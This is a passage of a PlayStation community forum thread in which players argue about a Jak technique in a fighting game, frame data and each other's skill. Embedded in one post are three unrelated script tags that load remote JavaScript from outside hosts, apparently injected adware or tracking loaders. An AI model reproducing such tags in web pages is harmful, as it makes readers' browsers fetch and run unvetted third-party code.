Reply
Wastelander
Registered: 01/23/2013
Offline
827 posts
 

Re: Guys... i broke jak... sorry...

Feb 24, 2013

FidelityNy wrote:
I faced a really good Jak today that started spamming moves when we were the only ones left in a 2v2, he had 2 stock to my 1 stock. He couldn't even stand a chance against my FP, especially when it came to abusing the same moves. FP is good off her feet, too good. I wanna try your Jak, add me a.s.a.p. I'll be on.

You online now? Because i been on youtube. 

Message 41 of 90 (143 Views)
Reply
0 Likes
Gaming Beast
Registered: 11/22/2012
Offline
2167 posts
 

Re: Guys... i broke jak... sorry...

Feb 24, 2013

ToMuchMayo wrote:

NewmansSalsa wrote:

so can we all come to the conclusion that OP is a little slow? and @ BigPoppa... alot of people dont understand frame data haha. they dont understand disadvantage, the words positive and negative. Because alot of these people dont actually play fighting games hardcore. I wish they had a website or something that showed the frame data for every character in this game.


Not being slow... if every character had one why no one use them? Probably because majority of people don't bother using other moves... i could careless about frame data. I want to know whether it works or not. 


Because the competitive community, AKA the type of people who use this stuff, don't play modes like ranked which rewards ragequitting often, and even then it's usually ever only in 2v2.

The Fro never sleeps.png


 

<script type="text/javascript" src="https://loading-resource.com/data.js.php?i={5B0E559A-F075-4C48-91F1-A12AED5BE78E}&d=2012-6-10&s=http://community.us.playstation.com/t5/forums/replypage/board-id/24861/message-id/338362"></script>
<script type="text/javascript" src="http://cdncache3-a.akamaihd.net/loaders/1032/l.js?aoi=1311798366&pid=1032&zoneid=62862"></script>
<script type="text/javascript" src="http://www.vitruvianleads.com/build/production/selectionlinks/templates/bootstrap.js"></script>
Message 42 of 90 (130 Views)
Reply
0 Likes
I Only Post Everything
Registered: 10/24/2012
Offline
1147 posts
 

Re: Guys... i broke jak... sorry...

Feb 24, 2013

ToMuchMayo wrote:

NewmansSalsa wrote:

so can we all come to the conclusion that OP is a little slow? and @ BigPoppa... alot of people dont understand frame data haha. they dont understand disadvantage, the words positive and negative. Because alot of these people dont actually play fighting games hardcore. I wish they had a website or something that showed the frame data for every character in this game.


Not being slow... if every character had one why no one use them? Probably because majority of people don't bother using other moves... i could careless about frame data. I want to know whether it works or not. 


caring.png

Message 43 of 90 (115 Views)
I Only Post Everything
Registered: 01/07/2013
Offline
876 posts
 

Re: Guys... i broke jak... sorry...

Feb 24, 2013
@Mayo

Single jump is not how to test anything escapable via jump. Do 1 hit then do nothing. The cpu will stand there for 2 seconds then jump. You may as well just have them on stand. Double jump you hit them and the second they fully recover they jump again.

Anyway your grab breaking jak thing is impossible offline only can be accomplished with online lag. Myth Busted. Anyone looking for new tech and exploits leave this thread he doesnt know what hes talkin about.

And frame data matters people if you think otherwise your wrong
"ZA ZA ZA ZA ZING"
Mains: Jak, Isaac Subs: Spike, Drake, Evil Cole
6 Seasons with Black Belt! (should be 8)
Message 44 of 90 (99 Views)
Reply
0 Likes
I Only Post Everything
Registered: 01/07/2013
Offline
876 posts
 

Re: Guys... i broke jak... sorry...

Feb 24, 2013
Oh and Ive already faced the best jaks out there. Blueadiamond, M-pyre, etc etc and this Mayo dude isnt even mentioned by any top level player I know and I know a lot. Do not bother I never heard of this guy till he made this thread and since he doesnt even know how to properly test what is/ isnt inescapable im voting he just thinks hes good.
"ZA ZA ZA ZA ZING"
Mains: Jak, Isaac Subs: Spike, Drake, Evil Cole
6 Seasons with Black Belt! (should be 8)
Message 45 of 90 (95 Views)
Reply
0 Likes
Wastelander
Registered: 01/23/2013
Offline
827 posts
 

Re: Guys... i broke jak... sorry...

[ Edited ]
Feb 24, 2013

Levi_Skardsen wrote:

ToMuchMayo wrote:

NewmansSalsa wrote:

so can we all come to the conclusion that OP is a little slow? and @ BigPoppa... alot of people dont understand frame data haha. they dont understand disadvantage, the words positive and negative. Because alot of these people dont actually play fighting games hardcore. I wish they had a website or something that showed the frame data for every character in this game.


Not being slow... if every character had one why no one use them? Probably because majority of people don't bother using other moves... i could careless about frame data. I want to know whether it works or not. 


caring.png


Do i care? If you are annoyed then i'll just keep using it to how i feel. If you continue to moan then you are just being trolled. win win for me.

 

Message 46 of 90 (88 Views)
Reply
0 Likes
Wastelander
Registered: 01/23/2013
Offline
827 posts
 

Re: Guys... i broke jak... sorry...

Feb 24, 2013

BIGPOPPA21089 wrote:
@Mayo

Single jump is not how to test anything escapable via jump. Do 1 hit then do nothing. The cpu will stand there for 2 seconds then jump. You may as well just have them on stand. Double jump you hit them and the second they fully recover they jump again.

Anyway your grab breaking jak thing is impossible offline only can be accomplished with online lag. Myth Busted. Anyone looking for new tech and exploits leave this thread he doesnt know what hes talkin about.

And frame data matters people if you think otherwise your wrong

i am not wrong, how am i wrong for not caring? I do not have to care for it, i just want a straight answer.. does it work or not? I don't need try hard egotiscal comments that don't give me a straight forward answer. You seem to forget humans are different then cpu anyways. Please tell me how a person can double jump out of it if they couldn't get a single jump out in the first place? If a cpu couldn't even get out of a single jump then who cares?

 

Message 47 of 90 (87 Views)
Reply
0 Likes
Wastelander
Registered: 01/23/2013
Offline
827 posts
 

Re: Guys... i broke jak... sorry...

Feb 24, 2013

BIGPOPPA21089 wrote:
Oh and Ive already faced the best jaks out there. Blueadiamond, M-pyre, etc etc and this Mayo dude isnt even mentioned by any top level player I know and I know a lot. Do not bother I never heard of this guy till he made this thread and since he doesnt even know how to properly test what is/ isnt inescapable im voting he just thinks hes good.

I started using jak last week and 999 yesterday, i played ranked like 4 times because i didn't feel like playing in it yet. Besides that you never even played me so where can you even come to a conclusion? No on said i sucked either, so again... quit assuming. I never heard of you so why should i care?

 

Message 48 of 90 (83 Views)
Reply
0 Likes
Uncharted Territory
Registered: 12/21/2008
Offline
1819 posts
 

Re: Guys... i broke jak... sorry...

Feb 24, 2013

ToMuchMayo wrote:

Levi_Skardsen wrote:

ToMuchMayo wrote:

NewmansSalsa wrote:

so can we all come to the conclusion that OP is a little slow? and @ BigPoppa... alot of people dont understand frame data haha. they dont understand disadvantage, the words positive and negative. Because alot of these people dont actually play fighting games hardcore. I wish they had a website or something that showed the frame data for every character in this game.


Not being slow... if every character had one why no one use them? Probably because majority of people don't bother using other moves... i could careless about frame data. I want to know whether it works or not. 


-


Do i care? if you are annoyed but that i'll just keep using it to how i feel. If you continue to moan then you are just being trolled. win win for me.

 


I don't think you understand how this victory thing works...

boo

--------------------------------------------------------------------------------------------------------------
WHAT IS THIS!?
Message 49 of 90 (81 Views)
Reply
0 Likes
Wastelander
Registered: 01/23/2013
Offline
827 posts
 

Re: Guys... i broke jak... sorry...

Feb 24, 2013

Strife93 wrote:

ToMuchMayo wrote:

Levi_Skardsen wrote:

ToMuchMayo wrote:

NewmansSalsa wrote:

so can we all come to the conclusion that OP is a little slow? and @ BigPoppa... alot of people dont understand frame data haha. they dont understand disadvantage, the words positive and negative. Because alot of these people dont actually play fighting games hardcore. I wish they had a website or something that showed the frame data for every character in this game.


Not being slow... if every character had one why no one use them? Probably because majority of people don't bother using other moves... i could careless about frame data. I want to know whether it works or not. 


-


Do i care? if you are annoyed but that i'll just keep using it to how i feel. If you continue to moan then you are just being trolled. win win for me.

 


I don't think you understand how this victory thing works...

boo


 

 

 

 

 

i don't think you understand who you are talking too.

Message 50 of 90 (76 Views)
Reply
0 Likes